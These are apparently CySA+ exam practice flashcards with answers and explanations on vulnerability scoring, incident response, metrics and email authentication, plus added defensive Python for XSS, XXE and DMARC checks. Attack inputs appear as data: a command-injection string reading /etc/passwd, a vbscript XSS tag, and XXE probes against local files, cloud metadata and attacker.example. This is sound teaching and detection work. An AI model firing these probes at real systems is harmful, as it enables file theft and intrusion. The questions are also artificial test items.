CYAC+ 003 - questions Flashcards

1
Q

A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?

A. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
B. CVSS:3.1/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:3.1/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:3.1/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

A

The answer is A.

Option A is the only vector that matches the scenario: network attack vector (AV:N), low attack complexity (AC:L), no privileges required (PR:N), no user interaction (UI:N), unchanged scope (S:U), and high confidentiality and integrity impact (C:H/I:H). It still lists a low availability impact (A:L) although the question says availability is unaffected (A:N would match exactly), but it remains the best fit: B requires high privileges and user interaction, C has low confidentiality and no integrity impact, and D is a local attack.

Several values in the options (I:K in A, AV:K in B, UI:H in C, PR:R in D) are not defined in CVSS v3.1 and are transcription errors. The valid base-metric values are AV:{N,A,L,P}, AC:{L,H}, PR:{N,L,H}, UI:{N,R}, S:{U,C} and C/I/A:{H,L,N}; read I:K in option A as I:H.

Reference:
https://www.first.org/cvss/calculator/3.1

2
Q

Which of the following items should be included in a vulnerability scan report? (Choose two.)

A. Lessons learned
B. Service-level agreement
C. Playbook
D. Affected hosts
E. Risk score
F. Education plan

A

Selected Answer: DE
Correct. From CertMaster:

Vulnerability Report Content
The report should detail identified vulnerabilities, such as missing patches, incorrect configuration settings, and weak passwords, and include the following:
- Details regarding the type of vulnerability
- The number of instances
- The affected systems
- The risk levels
- Recommendations

3
Q

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

A. A mean time to remediate of 30 days
B. A mean time to detect of 45 days
C. A mean time to respond of 15 days
D. Third-party application testing

A

Selected Answer: A

Exploitation in this industry begins about 45 days after a patch is released, so the control that closes the window is remediating faster than that: a mean time to remediate of 30 days gets fixes applied before the typical exploitation date. A mean time to detect of 45 days would only notice an attack once it had started, a 15-day mean time to respond measures reaction to alerts rather than closing the vulnerability, and third-party application testing finds issues but does not fix them.

4
Q

The security team reviews a web server for XSS and runs the following Nmap scan:

Which of the following most accurately describes the result of the scan?

A. An output of characters > and " as the parameters used in the attempt
B. The vulnerable parameter ID http://172.31.15.2/1.php?id=2 and unfiltered characters returned
C. The vulnerable parameter and unfiltered or encoded characters passed > and “ as unsafe
D. The vulnerable parameter and characters > and “ with a reflected XSS attempt

A

Selected Answer: D

The scan output names the vulnerable parameter (id) and the characters > and " that were reflected back into the page unescaped, which is the signature of a reflected XSS test. This is the finding format of Nmap's http-unsafe-output-escaping NSE script ("Characters [> " '] reflected in parameter id at ..."): it inserts a probe string containing > " ' into each parameter and reports the characters that come back without HTML escaping. Options B and C each describe only part of the finding (the parameter, or the characters), and A mislabels the output as the attack input.
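As an added illustration (not code from the flashcard deck or from Nmap), the check behind an unsafe-output-escaping finding: a unique marker followed by the characters > " ' is placed in the parameter, and the response is inspected to see which of them come back raw, which come back HTML-encoded, and which were removed. No HTTP server is involved: three constructed page handlers stand in for the scanned 1.php (vulnerable, partially filtering, and hardened), and `fetch` is any callable that takes a URL and returns the body.

```python
"""Added example: detect unescaped reflection of > " ' in a query parameter."""
import html
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

PROBE_CHARS = ">\"'"
# Encodings a correctly escaping page may use for each probe character.
ENTITIES = {">": ("&gt;",), '"': ("&quot;", "&#34;", "&#x22;"), "'": ("&#x27;", "&#39;", "&apos;")}


def _param(url: str, name: str) -> str:
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [""])[0]


def vulnerable_page(url: str) -> str:
    """Constructed stand-in for 1.php: echoes ?id= straight into the markup."""
    return f"<html><body><p>Results for id={_param(url, 'id')}</p></body></html>"


def filtering_page(url: str) -> str:
    """Constructed blacklist filter: strips > but leaves quotes, so attribute
    contexts remain exploitable."""
    return f"<html><body><p>Results for id={_param(url, 'id').replace('>', '')}</p></body></html>"


def hardened_page(url: str) -> str:
    """Constructed fix: HTML-encode the reflected value, quotes included."""
    return f"<html><body><p>Results for id={html.escape(_param(url, 'id'), quote=True)}</p></body></html>"


def check_reflection(fetch, url: str, param: str) -> dict:
    """Probe one parameter and report how each probe character was reflected."""
    marker = "zq" + secrets.token_hex(4)          # unique, so we find our own echo
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    query[param] = [marker + PROBE_CHARS]
    body = fetch(urlunsplit(parts._replace(query=urlencode(query, doseq=True))))
    pos = body.find(marker)
    report = {"reflected": pos >= 0, "unescaped": [], "encoded": [], "removed": []}
    if pos < 0:
        return report
    rest = body[pos + len(marker):]
    for ch in PROBE_CHARS:                        # consume the echo in probe order
        if rest.startswith(ch):
            report["unescaped"].append(ch)
            rest = rest[1:]
            continue
        entity = next((e for e in ENTITIES[ch] if rest.startswith(e)), None)
        if entity:
            report["encoded"].append(ch)
            rest = rest[len(entity):]
        else:
            report["removed"].append(ch)
    return report


if __name__ == "__main__":
    target = "http://172.31.15.2/1.php?id=2"
    for name, page in [("vulnerable", vulnerable_page), ("filtering", filtering_page),
                       ("hardened", hardened_page)]:
        print(name, check_reflection(page, target, "id"))
```

Against a live target you are authorized to test, pass something like `lambda u: urllib.request.urlopen(u).read().decode()` as `fetch`. The consume-in-order loop matters: simply searching the whole body for a raw > would be fooled by the page's own closing tags, which is why the partially filtering page is reported as removing > while still reflecting both quote characters.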

5
Q

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?

A. Code analysis
B. Static analysis
C. Reverse engineering
D. Fuzzing

A

Selected Answer: C
Static analysis is typically done when you have the source code in front of you. This is a precompiled binary; you won't know its libraries, functions, system calls, etc. without reverse engineering of some kind. Typically what you'll do is put it in some sort of sandbox and see what it beacons to, etc. I guess you can call that reverse engineering, so C would be the best answer here.

6
Q

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

A. Hard disk
B. Primary boot partition
C. Malicious files
D. Routing table
E. Static IP address

A

Selected Answer: D

Isolating the server changes or destroys its network state, so the most volatile data is captured first and the disk afterwards. The routing table is the only listed item in the volatile tier; the hard disk, boot partition and malicious files persist and can be imaged after isolation, and the static IP address is configuration that can be recovered from documentation.

The "Guidelines for Evidence Collection and Archiving" (RFC 3227) establish the following order of volatility:

  • registers, cache
  • routing table, ARP cache, process table, kernel statistics, memory
  • temporary file systems
  • disk
  • remote logging and monitoring data that is relevant to the system in question
  • physical configuration, network topology
  • archival media
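An added example, not from the deck or from RFC 3227 itself, of what "collect the volatile tier first" looks like in practice: a first-pass live collection that runs the network- and process-state commands in order of volatility, writes each output to the case directory, and records a SHA-256 manifest so the captures can be tied to the case later. It assumes a Linux host and the usual iproute2/procps tools; anything not installed is recorded as skipped rather than aborting the run. Memory acquisition would normally precede the routing table but needs a privileged tool such as LiME or AVML, so it is left out here.

```python
"""Added example: volatile-first live collection in RFC 3227 order, with an
integrity manifest. Constructed for illustration; run from trusted binaries."""
import datetime as dt
import hashlib
import pathlib
import shutil
import subprocess

# (file label, argv), most volatile first. Disk imaging comes after all of these.
VOLATILE_STEPS = [
    ("01_clock",         ["date", "-u", "+%Y-%m-%dT%H:%M:%SZ"]),
    ("02_uptime",        ["uptime"]),
    ("03_routing_table", ["ip", "route", "show"]),
    ("04_arp_cache",     ["ip", "neigh", "show"]),
    ("05_sockets",       ["ss", "-tunap"]),
    ("06_processes",     ["ps", "-eo", "pid,ppid,user,etime,cmd"]),
    ("07_logged_in",     ["who"]),
    ("08_mounts",        ["mount"]),
]


def run_step(argv) -> bytes:
    """Run one collection command. Never raises: a failed step must not stop
    the collection of everything after it."""
    if shutil.which(argv[0]) is None:
        return f"SKIPPED: {argv[0]} not installed\n".encode()
    try:
        res = subprocess.run(argv, capture_output=True, timeout=30)
        return res.stdout + res.stderr
    except (OSError, subprocess.SubprocessError) as exc:
        return f"ERROR: {exc}\n".encode()


def collect_volatile(outdir) -> dict:
    """Collect in order, write each output under outdir, and return
    {label: sha256 hex digest}; the same digests are written to MANIFEST.sha256."""
    out = pathlib.Path(outdir)
    out.mkdir(parents=True, exist_ok=True)
    started = dt.datetime.now(dt.timezone.utc).isoformat()
    manifest = {}
    for label, argv in VOLATILE_STEPS:
        data = run_step(argv)
        (out / f"{label}.txt").write_bytes(data)
        manifest[label] = hashlib.sha256(data).hexdigest()
    lines = [f"# collection started {started}"]
    lines += [f"{digest}  {label}.txt" for label, digest in manifest.items()]
    (out / "MANIFEST.sha256").write_text("\n".join(lines) + "\n")
    return manifest


def verify_manifest(outdir) -> bool:
    """Re-hash the captures and compare against the manifest."""
    out = pathlib.Path(outdir)
    for line in (out / "MANIFEST.sha256").read_text().splitlines():
        if line.startswith("#"):
            continue
        digest, name = line.split("  ", 1)
        if hashlib.sha256((out / name).read_bytes()).hexdigest() != digest:
            return False
    return True


if __name__ == "__main__":
    case_dir = "case-volatile"
    for label, digest in collect_volatile(case_dir).items():
        print(f"{digest[:16]}...  {label}")
    print("manifest verifies:", verify_manifest(case_dir))
```

Two caveats a responder should keep in mind: the collection itself alters the system (the collector's own process appears in the process list), so note the start time and the tools used; and on a suspected rootkit the host's own `ps` and `ss` may lie, which is why memory acquisition and offline analysis follow this first pass rather than replace it.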
7
Q

An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?

A. PCI Security Standards Council
B. Local law enforcement
C. Federal law enforcement
D. Card issuer

A

Selected Answer: D
Correct. First to the card issuer.
Under PCI DSS, a breached entity reports through the payment card ecosystem rather than to the PCI Security Standards Council, which maintains the standard but does not handle incidents. In this question's terms that is the card issuer, the bank that issued the cards and holds the cardholder relationship; it has specific reporting requirements and procedures for the organization to follow in the event of a breach, and the merchant's acquiring bank and the card brands are notified through the same process. Law enforcement may be involved, but PCI DSS does not make it the reporting party.
And to be clear, the card issuer is not Visa or Mastercard. It is the bank.

8
Q

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

A. Mean time to detect
B. Number of exploits by tactic
C. Alert volume
D. Quantity of intrusion attempts

A

Selected Answer: A

Mean time to detect (MTTD) measures how long it takes to detect a security incident or threat from the time it occurs. SIEM and SOAR investments are aimed directly at detecting and triaging incidents faster, and the ticketing system timestamps when each case is opened, so MTTD is the metric that shows whether those investments paid off. Alert volume and the quantity of intrusion attempts measure activity rather than the team's effectiveness, and exploits by tactic is a threat-profile view, not an operational metric.

9
Q

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user’s workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

A. Create a timeline of events detailing the date stamps, user account hostname and IP information associated with the activities
B. Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation
C. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation
D. Notify the SOC manager for awareness after confirmation that the activity was intentional

A

Selected Answer: B
Because we are dealing with privacy and HR, B is the answer: keep user-identifiable information out of the case details, password-protect the evidence, and restrict access to the personnel involved in the investigation. A describes the actual investigative product to be submitted, and hostname and IP information isn't really a privacy concern on an organizational network, but A does nothing to limit who can see the case.

10
Q

A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?

A. Testing
B. Implementation
C. Validation
D. Rollback

A

Selected Answer: C

You test the patch before you apply it, and after you apply it, you validate it. I choose option C. Validation.

11
Q

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?

A. Data enrichment
B. Security control plane
C. Threat feed combination
D. Single pane of glass

A

Selected Answer: D

A single pane of glass is a unified view of a network or system: one interface from which administrators monitor, configure and control all of its components and related services. Consolidating the security controls into the SIEM gave the analyst that unified view, so there was no longer any need to switch between consoles, which is what shortened MTTR.

Data enrichment (adding context to events) and combining threat feeds would improve alert quality, but neither removes the tool-hopping the question describes. With a single pane of glass, security teams can also automate workflows and get real-time visibility into incidents and events, which simplifies responding to and resolving them.

12
Q

A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?

A. Change the display filter to ftp.active.port
B. Change the display filter to tcp.port==20
C. Change the display filter to ftp-data and follow the TCP streams
D. Navigate to the File menu and select FTP from the Export objects option

A

Selected Answer: C

The ftp display filter matches only the control channel (TCP port 21 by default), which carries the RETR commands and the 226 Transfer complete replies. The file bytes travel on a separate data connection, which Wireshark dissects as ftp-data. Changing the filter to ftp-data and using Follow > TCP Stream on each data connection shows the full content of each downloaded file, which can then be saved as raw bytes.

tcp.port==20 only works for active-mode transfers; in passive mode the server opens an ephemeral port for each transfer, so filtering on port 20 would miss the data. ftp.active.port is a field, not a filter that selects the transfers.

13
Q

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

A. Scope
B. Weaponization
C. CVSS
D. Asset value

A

Selected Answer: B

Weaponization is the factor the analyst would communicate: a working exploit for the vulnerability is now widely available and is being used to deliver ransomware, so the vulnerability is far more likely to be exploited against the organization than its original rating suggested, and its priority rises accordingly.

One caveat on wording: the CVSS base score itself does not change when an exploit appears. Exploit availability is expressed through the Temporal metric Exploit Code Maturity, which can only lower the score from its base value, so a jump from 7.1 to 9.8 reflects an organization's or vendor's own risk scoring rather than a recalculated CVSS base score. Scope and asset value are other scoring factors, but neither is what changed here, and "CVSS" names the scoring system rather than a reason.

14
Q

Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

A. Identify any improvements or changes in the incident response plan or procedures
B. Determine if an internal mistake was made and who did it so they do not repeat the error
C. Present all legal evidence collected and turn it over to law enforcement
D. Discuss the financial impact of the incident to determine if security controls are well spent

A

Selected Answer: A

The lessons-learned meeting exists to improve the response process: what the plan and procedures got wrong or left out, and what should change before the next incident. Assigning blame to individuals discourages honest reporting, handing evidence to law enforcement happens during the incident when warranted rather than as a retrospective step, and the financial impact informs budgeting but is not the purpose of lessons learned.

15
Q

Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer’s customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?

A. Isolate Joe’s PC from the network
B. Reimage the PC based on standard operating procedures
C. Initiate a remote wipe of Joe’s PC using mobile device management
D. Perform no action until HR or legal counsel advises on next steps

A

Selected Answer: D

Before any technical actions are taken, it is crucial to involve HR and legal counsel to assess the situation, understand the legal implications of Joe’s actions, and determine the appropriate course of action. This ensures that any response is in compliance with employment laws and company policies.

16
Q

The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?

A. Reduce the administrator and privileged access accounts
B. Employ a network-based IDS
C. Conduct thorough incident response
D. Enable SSO to enterprise applications

A

Selected Answer: A

Zero trust is a security framework that assumes threats exist both inside and outside the network. It emphasizes the principle of least privilege: users and systems should have only the minimum level of access necessary to perform their tasks. Common attack frameworks such as MITRE ATT&CK and the Cyber Kill Chain show attackers pursuing privileged credentials to escalate and move laterally, so reducing the number of administrator and privileged accounts shrinks the attack surface most directly. A network IDS and incident response are detective and reactive controls, and SSO improves usability but by itself concentrates access rather than reducing it.

17
Q

While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?

A. Shut the network down immediately and call the next person in the chain of command.
B. Determine what attack the odd characters are indicative of.
C. Utilize the correct attack framework and determine what the incident response will consist of.
D. Notify the local law enforcement for incident response.

A

Selected Answer: B

Do we know yet what the odd characters are indicative of? Is this even an attack? We need to investigate and determine whether this is an incident first, for example by URL-decoding the request lines and comparing them with known injection and scanning patterns, before we consult an attack framework. Shutting the network down or calling law enforcement is not a proportionate first step for unexplained log entries.

18
Q

A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:
Which of the following log entries provides evidence of the attempted exploit?

A. Log entry 1
B. Log entry 2
C. Log entry 3
D. Log entry 4

A

Correct Answer: D

Explanation:
Log entry 4 shows an attempt to exploit the command injection vulnerability by appending a malicious command (;cat /etc/passwd) to the end of a legitimate request (/cgi-bin/index.cgi?name=John). The semicolon terminates the command the application intended to run and the appended command reads /etc/passwd, which contains user account information and could lead to further compromise of the system. The other log entries contain no shell metacharacters or commands that would alter the intended behavior of the application.

References:
https://www.imperva.com/learn/application-security/command-injection/
https://www.zerodayinitiative.com/advisories/published/

19
Q

A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?

A. Mean time between failures
B. Mean time to detect
C. Mean time to remediate
D. Mean time to contain

A

Selected Answer: D

Explanation:

Mean time to contain (MTTC) measures the average time it takes to isolate a security incident and stop it spreading once it has been detected, which is exactly what the executives asked about. Mean time to detect stops at detection, mean time to remediate runs through to the final fix, and mean time between failures is a reliability metric unrelated to incident response.

20
Q

While reviewing web server logs, a security analyst found the following line:

<IMG SRC='vbscript:msgbox("test")'>

Which of the following malicious activities was attempted?

A. Command injection
B. XML injection
C. Server-side request forgery
D. Cross-site scripting

A

Selected Answer: D

The line is a cross-site scripting (XSS) payload: an image tag whose SRC is a vbscript: URL, so that a browser rendering the page (legacy Internet Explorer honored such URLs) would execute msgbox("test"). A harmless message box is the classic proof that script execution is possible; a real attack would substitute code that steals session cookies or acts as the victim. Command injection targets the server's shell, XML injection targets an XML parser, and SSRF makes the server issue requests; none of them involve a browser executing injected script.

21
Q

A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?

A. Operating system version
B. Registry key values
C. Open ports
D. IP address

A

Selected Answer: B

A scanner appliance configured only with subnets to scan is running an uncredentialed network scan. It sees what the hosts expose over the network: their IP addresses, open ports and services, and, from banners and fingerprints, the likely operating system version. Registry key values live inside Windows hosts and are only readable with credentialed (authenticated) scanning or an installed agent, so they would be missing from this scan.

22
Q

A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?

A. Non-credentialed scanning
B. Passive scanning
C. Agent-based scanning
D. Credentialed scanning

A

Selected Answer: B

OT/ICS devices are often fragile and business-critical; an active scan that probes ports or sends unexpected requests can crash a PLC or HMI, so the aim is to identify vulnerabilities without sending anything to the device. Passive scanning does that: it observes traffic (typically from a SPAN port or tap) and infers devices, protocols, firmware versions and known vulnerabilities from what it sees, adding no traffic to the network. Non-credentialed and credentialed scans both probe the device actively, and agent-based scanning requires installing software on devices that usually cannot host it.

Passive monitoring relies on capturing information about the network as traffic passes a location on a network link. Unlike active and router-based monitoring, passive monitoring does not add traffic to the network. It also performs after-the-fact analysis, since packets must be captured and analyzed rather than measured in real time as they are sent.

23
Q

A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?

A. Conduct security awareness training on the risks of using unknown and unencrypted USBs.
B. Write a removable media policy that explains that USBs cannot be connected to a company asset.
C. Check configurations to determine whether USB ports are enabled on company assets.
D. Review logs to see whether this exploitable vulnerability has already impacted the company.

A

Selected Answer: C

With a known, actively exploited vulnerability delivered through the USB interface, the first action is the one that removes the attack path fastest. Checking configurations to determine whether USB ports are enabled on company assets (option C) tells the analyst immediately how exposed the fleet is and allows ports to be disabled or restricted through configuration, which stops further exploitation. Awareness training and a removable media policy matter but take time to have an effect, and reviewing logs for past impact is an investigation step that follows once the exposure is closed.

24
Q

A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:

Which of the following vulnerability types is the security analyst validating?

A. Directory traversal
B. XSS
C. XXE
D. SSRF

A

Selected Answer: C
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application’s processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.
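Since the snippet the analyst used is not reproduced here, the following added example (not from the deck or from the quoted description) shows how to tell an XXE probe apart from the other options in the question by reading the payload itself. Directory traversal lives in a URL path, XSS is HTML or script, and plain SSRF is a URL the server is made to fetch; XXE is a DOCTYPE that declares an external entity and references it. analyze_xml() parses the internal DTD subset of a request body and reports what the entities point at, including the XXE-to-SSRF escalation mentioned above, and reject_dtd() is the pre-parse check a hardened endpoint can apply. The probe payloads are constructed.

```python
"""Added example: classify the DTD of an XML request body (XXE triage)."""
import re

DOCTYPE_RE = re.compile(
    r"<!DOCTYPE\s+(?P<root>[\w:.-]+)\s*(?:\[(?P<subset>.*?)\]\s*)?>", re.S | re.I)
# <!ENTITY [%] name SYSTEM "uri"> | <!ENTITY name PUBLIC "id" "uri"> | <!ENTITY name "value">
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.-]+)\s+"
    r"(?:(?P<kind>SYSTEM|PUBLIC)\s+(?:[\"'][^\"']*[\"']\s+)?[\"'](?P<uri>[^\"']*)[\"']"
    r"|[\"'](?P<value>[^\"']*)[\"'])",
    re.I,
)
PREDEFINED = {"amp", "lt", "gt", "quot", "apos"}


def analyze_xml(body: str) -> dict:
    """Report declared entities, referenced general entities and a verdict."""
    result = {"dtd": False, "entities": [], "referenced": [],
              "verdict": "no DTD: not an XXE attempt"}
    m = DOCTYPE_RE.search(body)
    if not m:
        return result
    result["dtd"] = True
    for e in ENTITY_RE.finditer(m.group("subset") or ""):
        result["entities"].append({
            "name": e.group("name"),
            "parameter": e.group("param") is not None,
            "external": e.group("kind") is not None,
            "uri": e.group("uri"),
        })
    content = body[m.end():]
    result["referenced"] = sorted(set(re.findall(r"&([\w.-]+);", content)) - PREDEFINED)
    external = [e for e in result["entities"] if e["external"]]
    if not external:
        result["verdict"] = "internal entities only: possible entity expansion, not XXE"
    elif any(e["parameter"] for e in external):
        result["verdict"] = "blind/out-of-band XXE: parameter entity pulls an external DTD"
    elif any(e["uri"].lower().startswith(("file:", "/", "php://")) for e in external):
        result["verdict"] = "classic XXE: external entity reads a local file"
    elif any(e["uri"].lower().startswith(("http://", "https://", "ftp://", "gopher://"))
             for e in external):
        result["verdict"] = "XXE used for SSRF: the parser fetches a URL from the server side"
    else:
        result["verdict"] = "XXE: external entity with an unrecognised scheme"
    return result


def reject_dtd(body: str) -> bool:
    """Hardened endpoints that never need a DTD can refuse any document carrying
    one before it reaches the XML parser. True means 'refuse'."""
    return DOCTYPE_RE.search(body) is not None or "<!ENTITY" in body.upper()


# Constructed probes of the kind an analyst sends to confirm a scanner finding.
XXE_FILE = ('<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            '<foo>&xxe;</foo>')
XXE_SSRF = ('<?xml version="1.0"?><!DOCTYPE foo '
            '[<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><foo>&xxe;</foo>')
XXE_OOB = ('<?xml version="1.0"?><!DOCTYPE foo '
           '[<!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd"> %ext;]><foo>x</foo>')
INTERNAL_ONLY = '<!DOCTYPE foo [<!ENTITY greet "hello">]><foo>&greet;</foo>'
BENIGN = '<?xml version="1.0"?><order><id>42</id></order>'

if __name__ == "__main__":
    for name in ["XXE_FILE", "XXE_SSRF", "XXE_OOB", "INTERNAL_ONLY", "BENIGN"]:
        print(f"{name:<14} reject={reject_dtd(globals()[name])!s:<5} {analyze_xml(globals()[name])['verdict']}")
```

For validation the analyst sends the file-read probe and looks for /etc/passwd content (root:x:0:0) in the response; a positive confirms the scanner finding rather than a false positive. On the defensive side, rejecting any DTD is the simplest fix for endpoints that do not need one; where the parser is configurable, disabling external entity resolution (for example resolve_entities=False in lxml, or using defusedxml) closes the same hole.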

25
Q

An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that could reduce the impact of this situation?

A. Multifactor authentication
B. Password changes
C. System hardening
D. Password encryption

A

Selected Answer: A

Multifactor authentication (MFA) requires users to provide two or more pieces of evidence to verify their identity, such as a password plus a one-time code, a hardware token or a fingerprint. It reduces the impact of this leak because a username and password alone are no longer enough to get in: even with every employee's credentials, the attackers still need the second factor. Password changes are still necessary to invalidate the leaked credentials, but they do not protect against the next leak; system hardening and encrypting (or, properly, hashing) stored passwords do not address credentials that are already in the attackers' hands.

26
Q

The email system administrator for an organization configured DKIM signing for all email legitimately sent by the organization. Which of the following would most likely indicate an email is malicious if the company’s domain name is used as both the sender and the recipient?

A. The message fails a DMARC check
B. The sending IP address is the hosting provider
C. The signature does not meet corporate standards
D. The sender and reply address are different

A

Selected Answer: A

DMARC (Domain-based Message Authentication, Reporting, and Conformance) lets a domain owner protect the domain from unauthorized use, commonly known as email spoofing. It builds on SPF (Sender Policy Framework) and DKIM: a message passes DMARC only if SPF or DKIM passes for a domain that aligns with the domain in the visible From: header. A message that uses the company's own domain as sender yet fails DMARC therefore did not travel through the company's authorized, DKIM-signing mail path, which is the clearest indicator that it is spoofed. The other options are weak signals: organizations legitimately send from their hosting provider's IP addresses, signature formatting varies, and different From and Reply-To addresses are common in legitimate mail.
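An added example, not from the deck or from the DMARC specification (RFC 7489), of the alignment logic a receiver applies once it has the SPF and DKIM results in hand. It shows why a DKIM pass by itself proves nothing (an attacker can sign with their own domain) and why the strict/relaxed alignment setting decides whether mail from a subdomain such as mail.example.com is accepted. One assumption is labelled in the code: the organizational domain is taken as the last two labels instead of consulting the Public Suffix List, so it is right for example.com-style domains but not for example.co.uk.

```python
"""Added example: DMARC pass/fail from SPF and DKIM results plus alignment."""


def parse_dmarc_record(txt: str) -> dict:
    """'v=DMARC1; p=reject; adkim=s; aspf=r' -> {'v': 'DMARC1', 'p': 'reject', ...}"""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record")
    return tags


def org_domain(domain: str) -> str:
    """Organizational domain. Assumption for this example: last two labels,
    rather than the Public Suffix List a real receiver would consult."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(from_domain: str, auth_domain: str, mode: str) -> bool:
    """Identifier alignment: strict ('s') needs an exact match; relaxed ('r')
    accepts any domain sharing the organizational domain."""
    from_domain, auth_domain = from_domain.lower(), auth_domain.lower()
    if mode == "s":
        return from_domain == auth_domain
    return org_domain(from_domain) == org_domain(auth_domain)


def dmarc_evaluate(header_from: str, spf_result: str, spf_domain: str,
                   dkim_result: str, dkim_domain: str, record: dict) -> dict:
    """header_from: domain of the visible From: header.
    spf_domain: the envelope (MAIL FROM) domain SPF was evaluated against.
    dkim_domain: the d= of a signature that verified ('' if none did).
    record: the parsed DMARC record published by header_from's owner."""
    spf_aligned = (spf_result == "pass" and bool(spf_domain)
                   and aligned(header_from, spf_domain, record.get("aspf", "r")))
    dkim_aligned = (dkim_result == "pass" and bool(dkim_domain)
                    and aligned(header_from, dkim_domain, record.get("adkim", "r")))
    passed = spf_aligned or dkim_aligned
    return {
        "dmarc": "pass" if passed else "fail",
        "spf_aligned": spf_aligned,
        "dkim_aligned": dkim_aligned,
        # Disposition the receiver should apply; p=none is monitor-only.
        "disposition": "none" if passed else record.get("p", "none"),
    }


if __name__ == "__main__":
    record = parse_dmarc_record("v=DMARC1; p=reject; adkim=r; aspf=r")
    # Spoof: From: claims example.com, but SPF and DKIM both pass only for the
    # sender's own bulk-mailer.example domain, which does not align.
    print(dmarc_evaluate("example.com", "pass", "bulk-mailer.example",
                         "pass", "bulk-mailer.example", record))
    # Legitimate internal mail signed with d=mail.example.com (relaxed alignment).
    print(dmarc_evaluate("example.com", "fail", "forwarder.example",
                         "pass", "mail.example.com", record))
```

The first case is the question's scenario: sender and recipient both show the company's domain, SPF and DKIM even "pass" for the attacker's infrastructure, and DMARC still fails because neither authenticated domain aligns with the From: domain. The second case shows the caveat for the administrator who configured DKIM: with adkim=s, signing as mail.example.com would fail alignment for From: example.com.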

27
Q

The security analyst received the monthly vulnerability report. The following findings were included in the report:

  • Five of the systems only required a reboot to finalize the patch application
  • Two of the servers are running outdated operating systems and cannot be patched

The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?

A. Compensating controls
B. Due diligence
C. Maintenance windows
D. Passive discovery

A

Selected Answer: A

You have to compromise and meet in the middle sometimes. Compensating controls are the only option listed that reduces the risk; B, C and D don't apply in this context. From the Sybex CySA+ 003 study guide, page 20:

Compensating Controls
